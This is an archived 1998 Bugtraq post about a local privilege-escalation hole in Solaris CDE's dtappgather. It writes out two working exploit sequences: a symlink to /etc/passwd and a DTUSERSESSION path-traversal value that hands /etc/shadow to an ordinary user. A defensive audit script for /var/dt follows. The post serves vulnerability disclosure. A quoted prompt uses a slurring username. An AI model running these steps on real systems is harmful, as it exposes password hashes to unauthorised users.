The OpenNET Project / Index page
/usr/dt/bin/dtappgather exploit


X-RDate: Wed, 25 Feb 1998 13:14:50 +0500 (ESK)
Date: Tue, 24 Feb 1998 20:30:20 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: /usr/dt/bin/dtappgather exploit

>
>         I suppose you have learnt about CERT's advisory on dtappgather
> program. Well, here's the exploit:
>
> nigg0r@host% ls -l /etc/passwd
> -r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
> nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
> nigg0r@host% dtappgather

    the exploit is much simpler than that.
        hey, it's even documented on the man page :-)

    Simply

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow


    Anyway, your exploit has an advantage: it works (at least,
    in Solaris 2.5), even after patching CDE according to the CERT
    advisory.
    Solaris 2.6 seems to have the right permissions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
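A defender-side audit, added here and not part of the original post or of CDE: a POSIX shell function that walks a `/var/dt` tree and reports the two conditions the thread turns on, a world-writable directory without the sticky bit (compare the Solaris 2.6 modes quoted above, where only `/var/dt/tmp` is world-writable and it carries `t`) and any symlink planted under `appconfig/appmanager`. The base path is a parameter so it can be run against a copied or mounted tree; `readlink` is assumed to be available.

```shell
#!/bin/sh
# check_dt_tree BASE  - audit a CDE /var/dt tree (added example, not CDE code).
# Prints one finding per line; returns 0 when clean, 1 when anything is found.

# World-writable directories lacking the sticky bit. Solaris 2.6's
# /var/dt/tmp is rwxrwxrwt (sticky), which is acceptable; plain rwxrwxrwx
# lets any user plant or replace entries and is reported.
dir_mode_findings() {
    base="$1"
    find "$base" -type d -perm -0002 2>/dev/null | while read -r d; do
        mode=$(ls -ld "$d" | cut -c1-10)   # e.g. drwxrwxrwt
        case "$mode" in
            *t|*T) ;;                      # sticky bit set: fine
            *) echo "WORLD-WRITABLE-NO-STICKY $d" ;;
        esac
    done
}

# Symlinks under appconfig/appmanager: the object the quoted exploit plants
# so that dtappgather operates on whatever file the link points to.
symlink_findings() {
    base="$1"
    find "$base/appconfig/appmanager" -type l 2>/dev/null | while read -r l; do
        echo "SYMLINK $l -> $(readlink "$l")"
    done
}

check_dt_tree() {
    findings=$( dir_mode_findings "$1"; symlink_findings "$1" )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}
```

Run as `check_dt_tree /var/dt` from a periodic audit job; a non-zero exit is the signal to investigate.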
